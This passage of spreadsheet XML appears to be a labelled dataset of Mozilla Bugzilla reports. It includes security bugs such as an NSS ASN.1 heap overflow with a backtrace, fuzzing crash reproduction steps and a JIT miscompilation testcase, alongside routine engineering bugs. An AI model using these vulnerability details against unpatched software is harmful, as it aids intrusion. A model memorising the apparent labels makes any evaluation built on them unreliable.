          <t>P2</t>
        </is>
      </c>
      <c r="R6011" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6011" t="inlineStr">
        <is>
          <t>3.89</t>
        </is>
      </c>
      <c r="T6011" t="n">
        <v>1</v>
      </c>
      <c r="U6011" t="n">
        <v>0</v>
      </c>
      <c r="V6011" t="n">
        <v>23</v>
      </c>
      <c r="W6011" t="inlineStr">
        <is>
          <t>The attached testcase crashes on nss revision a3669ed2c606+ (build with fuzzing and ASan).
For detailed crash information, see attachment.
To reproduce the issue, perform the following steps:
1. Build NSS with fuzzing enabled: `./build.sh --asan --clang --fuzz` (assuming mozbuild clang/clang++ is on PATH and matching NSPR with ASan is installed/used).
2. Run `nssfuzz-pkcs12 test.bin`</t>
        </is>
      </c>
      <c r="X6011" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6012">
      <c r="A6012" t="n">
        <v>1434347</v>
      </c>
      <c r="B6012" t="inlineStr">
        <is>
          <t>2018-01-30 09:17:54 -0800</t>
        </is>
      </c>
      <c r="C6012" t="inlineStr">
        <is>
          <t>Redis LRU store fragile to SYMBOLS_URLS changes</t>
        </is>
      </c>
      <c r="D6012" t="inlineStr">
        <is>
          <t>2018-06-21 06:51:29 -0700</t>
        </is>
      </c>
      <c r="E6012" t="n">
        <v>1</v>
      </c>
      <c r="F6012" t="n">
        <v>1</v>
      </c>
      <c r="G6012" t="n">
        <v>4</v>
      </c>
      <c r="H6012" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6012" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J6012" t="inlineStr">
        <is>
          <t>Symbols</t>
        </is>
      </c>
      <c r="K6012" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6012" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6012" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6012" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6012" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6012" t="inlineStr"/>
      <c r="Q6012" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6012" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6012" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6012" t="n">
        <v>1</v>
      </c>
      <c r="U6012" t="n">
        <v>0</v>
      </c>
      <c r="V6012" t="n">
        <v>3</v>
      </c>
      <c r="W6012" t="inlineStr">
        <is>
          <t>Since the Redis LRU store stores things indefinitely, what might happen is that you get something stored first, then you change DJANGO_SYMBOLS_URLS and now expect different results in symbolication. 
Should be easy to solve by prefixing the keys by the hash of settings.SYMBOLS_URLS or something similar.</t>
        </is>
      </c>
      <c r="X6012" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6013">
      <c r="A6013" t="n">
        <v>1527460</v>
      </c>
      <c r="B6013" t="inlineStr">
        <is>
          <t>2019-02-12 13:46:28 -0800</t>
        </is>
      </c>
      <c r="C6013" t="inlineStr">
        <is>
          <t>switch webapp to everett</t>
        </is>
      </c>
      <c r="D6013" t="inlineStr">
        <is>
          <t>2024-02-29 11:38:48 -0800</t>
        </is>
      </c>
      <c r="E6013" t="n">
        <v>1</v>
      </c>
      <c r="F6013" t="n">
        <v>1</v>
      </c>
      <c r="G6013" t="n">
        <v>4</v>
      </c>
      <c r="H6013" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6013" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J6013" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K6013" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6013" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6013" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6013" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6013" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6013" t="inlineStr"/>
      <c r="Q6013" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6013" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6013" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6013" t="n">
        <v>1</v>
      </c>
      <c r="U6013" t="n">
        <v>0</v>
      </c>
      <c r="V6013" t="n">
        <v>9</v>
      </c>
      <c r="W6013" t="inlineStr">
        <is>
          <t>The webapp uses python-decouple to pull in configuration values from the environment.
Antenna uses Everett. I plan to use Everett for the processor, too. Everett works just like python-decouple, but makes testing and documentation easier. We currently have no documentation for webapp configuration values. Ew.
This bug covers switching the webapp from using python-decouple to Everett.</t>
        </is>
      </c>
      <c r="X6013" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6014">
      <c r="A6014" t="n">
        <v>701637</v>
      </c>
      <c r="B6014" t="inlineStr">
        <is>
          <t>2011-11-11 00:11:57 -0800</t>
        </is>
      </c>
      <c r="C6014" t="inlineStr">
        <is>
          <t>DOM related GC | Cycle Collector Crash triggered by harfbuzz buffer overrun</t>
        </is>
      </c>
      <c r="D6014" t="inlineStr">
        <is>
          <t>2015-10-16 11:40:08 -0700</t>
        </is>
      </c>
      <c r="E6014" t="n">
        <v>1</v>
      </c>
      <c r="F6014" t="n">
        <v>1</v>
      </c>
      <c r="G6014" t="n">
        <v>3</v>
      </c>
      <c r="H6014" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6014" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6014" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K6014" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6014" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6014" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6014" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6014" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6014" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q6014" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6014" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6014" t="inlineStr">
        <is>
          <t>mozilla9</t>
        </is>
      </c>
      <c r="T6014" t="n">
        <v>1</v>
      </c>
      <c r="U6014" t="n">
        <v>0</v>
      </c>
      <c r="V6014" t="n">
        <v>33</v>
      </c>
      <c r="W6014" t="inlineStr">
        <is>
          <t>1. http://www.haveeru.com.mv/dhivehi/south_asia/112652
   Windows XP only I think. May need to reload several times.
2. Crash [@ nsAttrValue::EnsureEmptyMiscContainer() ] 
Beta bp-dac1f532-e438-450c-b5d3-5e3c12111110
Aurora bp-67ee699e-b484-4106-bb16-0f7c72111111
Nightly bp-3267b454-6e6c-4a49-9da5-d4bfe2111111
Other urls:
http://www.haveeru.com.mv/dhivehi
http://www.haveeru.com.mv/dhivehi/atolls/112618
See also bug 681118 which is mobile ARM/Android only.
I originally saw this in the crash automation where debug Beta builds on Windows XP were firing crashdumps with _hb_ot_layout_get_glyph_property _hb_ot_layout_skip_mark PairPosFormat2::apply(hb_apply_context_t*) PairPos::apply(hb_apply_context_t*) PosLookupSubTable::apply(hb_apply_context_t*, unsigned int) stacks, but still exiting normally though Ted's exploitable tool rated these as low. Ted, I recently updated all my minidump_stackwalk's and your exploitable tool to tip. Any idea why it would generate dumps for the browser process while the browser would still exit normally?
Making sensitive since Ted's flagged it as low and it is GC/CC related.</t>
        </is>
      </c>
      <c r="X6014" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6015">
      <c r="A6015" t="n">
        <v>1245528</v>
      </c>
      <c r="B6015" t="inlineStr">
        <is>
          <t>2016-02-03 08:18:41 -0800</t>
        </is>
      </c>
      <c r="C6015" t="inlineStr">
        <is>
          <t>NSS Heap buffer overflow vulnerability in ASN1 certificate parsing</t>
        </is>
      </c>
      <c r="D6015" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:02 -0700</t>
        </is>
      </c>
      <c r="E6015" t="n">
        <v>1</v>
      </c>
      <c r="F6015" t="n">
        <v>1</v>
      </c>
      <c r="G6015" t="n">
        <v>3</v>
      </c>
      <c r="H6015" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6015" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J6015" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K6015" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L6015" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6015" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6015" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6015" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6015" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q6015" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6015" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6015" t="inlineStr">
        <is>
          <t>3.23</t>
        </is>
      </c>
      <c r="T6015" t="n">
        <v>1</v>
      </c>
      <c r="U6015" t="n">
        <v>0</v>
      </c>
      <c r="V6015" t="n">
        <v>60</v>
      </c>
      <c r="W6015" t="inlineStr">
        <is>
          <t>Created attachment 8715333
repro.tgz
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Steps to reproduce:
This vulnerability affects (at least) the latest NSS code available
from the mercurial.
By giving a malformed certificate (DER format) to the commonly used
SEC_ASN1DecodeItem() function, the parser crashes as shown in
the stacktrace attached to this post.
The joined archive file contains a simple C program and the invalid certificate
causing the issue.
Actual results:
The free of a pointer is crashing due to a previous memory corruption
caused by the memcpy() call in the sec_asn1d_parse_leaf() (secasn1d.c)
function.
After debugging, one can see the arena memory is effectively corrupted by
hundreds of bytes contained in the certificate.
----
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff65fd5b8 in _int_free (av=0x7ffff6929620 &lt;main_arena&gt;, p=&lt;optimized out&gt;, have_lock=0) at malloc.c:3996
3996    malloc.c: No such file or directory.
(gdb) bt
#0  0x00007ffff65fd5b8 in _int_free (av=0x7ffff6929620 &lt;main_arena&gt;, p=&lt;optimized out&gt;, have_lock=0) at malloc.c:3996
#1  0x00007ffff6d6ae52 in PR_Free (ptr=0xfa78e0) at ../../../../pr/src/malloc/prmem.c:458
#2  0x00007ffff6d7e261 in PR_DestroyLock (lock=0xfa78e0) at ../../../../pr/src/pthreads/ptsynch.c:167
#3  0x00007ffff73c5a11 in PORT_FreeArena_Util (arena=0xfa7880, zero=1) at secport.c:338
#4  0x00007ffff73c0869 in SEC_ASN1DecoderFinish_Util (cx=0xfa79b0) at secasn1d.c:2982
#5  0x00007ffff73c0afd in SEC_ASN1Decode_Util (poolp=0xfa6eb0, dest=0xfa7090, theTemplate=0x7ffff793c580 &lt;CERT_SignedDataTemplate&gt;,
    buf=0x61b700 &lt;in_cert&gt; "0\202\002\001\060\201\001A0\r\006\tCCCCCCCCC\005", len=1023) at secasn1d.c:3093
#6  0x00007ffff73c0b50 in SEC_ASN1DecodeItem_Util (poolp=0xfa6eb0, dest=0xfa7090,
    theTemplate=0x7ffff793c580 &lt;CERT_SignedDataTemplate&gt;, src=0x7fffffffe4a0) at secasn1d.c:3107
#7  0x000000000040864d in main () at certutil.c:52
---
Expected results:
The expected result is the stop of the invalid certificate parsing with an error value contained in the return of SEC_ASN1DecodeItem()  function.</t>
        </is>
      </c>
      <c r="X6015" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6016">
      <c r="A6016" t="n">
        <v>995816</v>
      </c>
      <c r="B6016" t="inlineStr">
        <is>
          <t>2014-04-13 16:41:02 -0700</t>
        </is>
      </c>
      <c r="C6016" t="inlineStr">
        <is>
          <t>Differential Testing: Different output message involving gc</t>
        </is>
      </c>
      <c r="D6016" t="inlineStr">
        <is>
          <t>2015-08-30 12:12:31 -0700</t>
        </is>
      </c>
      <c r="E6016" t="n">
        <v>1</v>
      </c>
      <c r="F6016" t="n">
        <v>1</v>
      </c>
      <c r="G6016" t="n">
        <v>3</v>
      </c>
      <c r="H6016" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6016" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6016" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K6016" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6016" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6016" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6016" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6016" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6016" t="inlineStr">
        <is>
          <t>[adv-main30+]</t>
        </is>
      </c>
      <c r="Q6016" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6016" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6016" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T6016" t="n">
        <v>1</v>
      </c>
      <c r="U6016" t="n">
        <v>0</v>
      </c>
      <c r="V6016" t="n">
        <v>14</v>
      </c>
      <c r="W6016" t="inlineStr">
        <is>
          <t>let t;
(function() {
    f = (function() {
        return (1 + -1 / 0) | 0
    })
})()
f()
gc()
print(f())
$ ./js-opt-64-dm-ts-darwin-ebdf2740dc3e --fuzzing-safe --ion-parallel-compile=off 2375.js
0
$ ./js-opt-64-dm-ts-darwin-ebdf2740dc3e --fuzzing-safe --ion-parallel-compile=off --ion-eager 2375.js
1
My configure flags are:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-optimize --disable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --disable-tests --enable-more-deterministic --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   http://hg.mozilla.org/mozilla-central/rev/3bada9bbc132
user:        Jon Coppeard
date:        Mon Dec 16 08:57:37 2013 +0000
summary:     Bug 950006 - Don't skip zeal GCs if allocating without the possibility of GC r=billm
Jon, is bug 950006 a possible regressor?
Setting this s-s just because gc seems to be involved, but I'll grab a random choice and pick sec-high for now - please feel free to change this as necessary.</t>
        </is>
      </c>
      <c r="X6016" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6017">
      <c r="A6017" t="n">
        <v>171639</v>
      </c>
      <c r="B6017" t="inlineStr">
        <is>
          <t>2002-09-29 23:47:14 -0700</t>
        </is>
      </c>
      <c r="C6017" t="inlineStr">
        <is>
          <t>dupes not marked in original bug</t>
        </is>
      </c>
      <c r="D6017" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:32 -0800</t>
        </is>
      </c>
      <c r="E6017" t="n">
        <v>1</v>
      </c>
      <c r="F6017" t="n">
        <v>1</v>
      </c>
      <c r="G6017" t="n">
        <v>4</v>
      </c>
      <c r="H6017" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6017" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6017" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K6017" t="inlineStr">
        <is>
          <t>2.17</t>
        </is>
      </c>
      <c r="L6017" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6017" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6017" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6017" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6017" t="inlineStr"/>
      <c r="Q6017" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6017" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6017" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T6017" t="n">
        <v>1</v>
      </c>
      <c r="U6017" t="n">
        <v>0</v>
      </c>
      <c r="V6017" t="n">
        <v>11</v>
      </c>
      <c r="W6017" t="inlineStr">
        <is>
          <t>since the groups checkin marking a bug a dupe adds the comment to the dupe 
but nothing shows in the original bug</t>
        </is>
      </c>
      <c r="X6017" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6018">
      <c r="A6018" t="n">
        <v>768568</v>
      </c>
      <c r="B6018" t="inlineStr">
        <is>
          <t>2012-06-26 11:20:00 -0700</t>
        </is>
      </c>
      <c r="C6018" t="inlineStr">
        <is>
          <t>Incorrect EV identity display (loading new page, identity not updated)</t>
        </is>
      </c>
      <c r="D6018" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E6018" t="n">
        <v>1</v>
      </c>
      <c r="F6018" t="n">
        <v>1</v>
      </c>
      <c r="G6018" t="n">
        <v>6</v>
      </c>
      <c r="H6018" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6018" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J6018" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K6018" t="inlineStr">
        <is>
          <t>10 Branch</t>
        </is>
      </c>
      <c r="L6018" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6018" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6018" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6018" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6018" t="inlineStr">
        <is>
          <t>[STR: comment 8][qa?][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q6018" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6018" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6018" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T6018" t="n">
        <v>1</v>
      </c>
      <c r="U6018" t="n">
        <v>0</v>
      </c>
      <c r="V6018" t="n">
        <v>41</v>
      </c>
      <c r="W6018" t="inlineStr">
        <is>
          <t>Created attachment 636798
Über Mozilla Firefox_2012-06-26_20-04-05 #1.png
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Build ID: 20120614114901
Steps to reproduce:
I've bin changed form a one https encrypted website to another https encrypted  one. 
Actual results:
On the address input box was still the certificate of the first website in green visible
Expected results:
On the address input box have to be the certificate of the second website</t>
        </is>
      </c>
      <c r="X6018" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6019">
      <c r="A6019" t="n">
        <v>1381359</v>
      </c>
      <c r="B6019" t="inlineStr">
        <is>
          <t>2017-07-16 17:56:33 -0700</t>
        </is>
      </c>
      <c r="C6019" t="inlineStr">
        <is>
          <t>Crash in java.lang.IllegalStateException: Tried changing pinned state before it''s determined. at org.mozilla.gecko.home.HomeFragment$ToggleASPinTask.&lt;init&gt;(HomeFragment.java)</t>
        </is>
      </c>
      <c r="D6019" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E6019" t="n">
        <v>1</v>
      </c>
      <c r="F6019" t="n">
        <v>1</v>
      </c>
      <c r="G6019" t="n">
        <v>6</v>
      </c>
      <c r="H6019" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6019" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J6019" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6019" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6019" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6019" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N6019" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6019" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6019" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q6019" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6019" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6019" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T6019" t="n">
        <v>1</v>
      </c>
      <c r="U6019" t="n">
        <v>0</v>
      </c>
      <c r="V6019" t="n">
        <v>17</v>
      </c>
      <c r="W6019" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-8800fa74-6043-4ad0-aa0d-1fbf70170716.
=============================================================
This is the Fennec #1 topcrash in Nightly 20170714131541.
Here's the top part of the stack trace:
&gt; java.lang.IllegalStateException: Tried changing pinned state before it's determined.
&gt; at org.mozilla.gecko.home.HomeFragment$ToggleASPinTask.&lt;init&gt;(HomeFragment.java:461)
&gt; at org.mozilla.gecko.home.HomeFragment.onContextItemSelected(HomeFragment.java:367)
&gt; at org.mozilla.gecko.home.TopSitesPanel.onContextItemSelected(TopSitesPanel.java:369)
&gt; at android.support.v4.app.Fragment.performContextItemSelected(Unknown Source)
&gt; at android.support.v4.app.FragmentManagerImpl.dispatchContextItemSelected(Unknown Source)
&gt; at android.support.v4.app.FragmentController.dispatchContextItemSelected(Unknown Source)
&gt; at android.support.v4.app.FragmentActivity.onMenuItemSelected(Unknown Source)
&gt; at android.support.v7.app.AppCompatActivity.onMenuItemSelected(Unknown Source)
&gt; at android.support.v7.view.WindowCallbackWrapper.onMenuItemSelected(Unknown Source)
&gt; at com.android.internal.policy.impl.PhoneWindow$DialogMenuCallback.onMenuItemSelected(PhoneWindow.java:4770)
&gt; at com.android.internal.view.menu.MenuBuilder.dispatchMenuItemSelected(MenuBuilder.java:761)
&gt; at com.android.internal.view.menu.MenuItemImpl.invoke(MenuItemImpl.java:152)
&gt; at com.android.internal.view.menu.MenuBuilder.performItemAction(MenuBuilder.java:904)
&gt; at com.android.internal.view.menu.MenuBuilder.performItemAction(MenuBuilder.java:894)
&gt; at com.android.internal.view.menu.MenuDialogHelper.onClick(MenuDialogHelper.java:180)
&gt; at com.android.internal.app.AlertController$AlertParams$3.onItemClick(AlertController.java:1106)
&gt; at android.widget.AdapterView.performItemClick(AdapterView.java:305)
&gt; at android.widget.AbsListView.performItemClick(AbsListView.java:1166)
&gt; at android.widget.AbsListView$PerformClick.run(AbsListView.java:3073)
&gt; at android.widget.AbsListView.onTouchUp(AbsListView.java:3907)
&gt; at android.widget.AbsListView.onTouchEvent(AbsListView.java:3666)
&gt; at android.view.View.dispatchTouchEvent(View.java:8744)
First occurrence is in the July 14 Nightly, which suggests this regression range:
https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=30ea2905130e85f9e1d8d56fa3097901eec6514b&amp;tochange=400584289c8fa44060d6443a3288ef57cf73ff4e
Bug 1377286 is probably the cause. Grisha, can you please investigate?</t>
        </is>
      </c>
      <c r="X6019" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6020">
      <c r="A6020" t="n">
        <v>1450040</v>
      </c>
      <c r="B6020" t="inlineStr">
        <is>
          <t>2018-03-29 10:55:53 -0700</t>
        </is>
      </c>
      <c r="C6020" t="inlineStr">
        <is>
          <t>Convert resultset_store.js to ReactJS</t>
        </is>
      </c>
      <c r="D6020" t="inlineStr">
        <is>
          <t>2018-11-07 04:56:18 -0800</t>
        </is>
      </c>
      <c r="E6020" t="n">
        <v>1</v>
      </c>
      <c r="F6020" t="n">
        <v>1</v>
      </c>
      <c r="G6020" t="n">
        <v>7</v>
      </c>
      <c r="H6020" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6020" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6020" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K6020" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6020" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6020" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6020" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6020" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6020" t="inlineStr"/>
      <c r="Q6020" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6020" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6020" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6020" t="n">
        <v>1</v>
      </c>
      <c r="U6020" t="n">
        <v>0</v>
      </c>
      <c r="V6020" t="n">
        <v>3</v>
      </c>
      <c r="W6020" t="inlineStr">
        <is>
          <t>This holds the main data of jobs and pushes for Treeherder, so it's a more complex model, basically.  We will need to determine how much to continue storing in here vs. just in the state of the PushList component.
Part of the overall conversion to ReactJS.
Estimated difficulty of 7</t>
        </is>
      </c>
      <c r="X6020" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6021">
      <c r="A6021" t="n">
        <v>1389560</v>
      </c>
      <c r="B6021" t="inlineStr">
        <is>
          <t>2017-08-11 10:06:56 -0700</t>
        </is>
      </c>
      <c r="C6021" t="inlineStr">
        <is>
          <t>Force update should be provided even if updater rolling-out is for partial population</t>
        </is>
      </c>
      <c r="D6021" t="inlineStr">
        <is>
          <t>2017-08-16 17:22:23 -0700</t>
        </is>
      </c>
      <c r="E6021" t="n">
        <v>1</v>
      </c>
      <c r="F6021" t="n">
        <v>1</v>
      </c>
      <c r="G6021" t="n">
        <v>5</v>
      </c>
      <c r="H6021" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6021" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6021" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K6021" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6021" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6021" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N6021" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6021" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6021" t="inlineStr"/>
      <c r="Q6021" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6021" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6021" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6021" t="n">
        <v>1</v>
      </c>
      <c r="U6021" t="n">
        <v>0</v>
      </c>
      <c r="V6021" t="n">
        <v>4</v>
      </c>
      <c r="W6021" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1389415 and Bug #1389506 +++
Force update should be provided from Help &gt; About Firefox even if updater rolling-out is for partial population.
Because, Vulnerability news has already been made public.
STR:
Help &gt; About Firefox
Actual Results:
Firefox is up to date
Expected Results:
Force update</t>
        </is>
      </c>
      <c r="X6021" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6022">
      <c r="A6022" t="n">
        <v>1159321</v>
      </c>
      <c r="B6022" t="inlineStr">
        <is>
          <t>2015-04-28 09:41:00 -0700</t>
        </is>
      </c>
      <c r="C6022" t="inlineStr">
        <is>
          <t>Well-known symbols in jsid's should not fire pre-barriers</t>
        </is>
      </c>
      <c r="D6022" t="inlineStr">
        <is>
          <t>2015-10-25 10:29:11 -0700</t>
        </is>
      </c>
      <c r="E6022" t="n">
        <v>1</v>
      </c>
      <c r="F6022" t="n">
        <v>1</v>
      </c>
      <c r="G6022" t="n">
        <v>3</v>
      </c>
      <c r="H6022" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6022" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6022" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K6022" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6022" t="inlineStr">
        <is>
          <t>All</t>
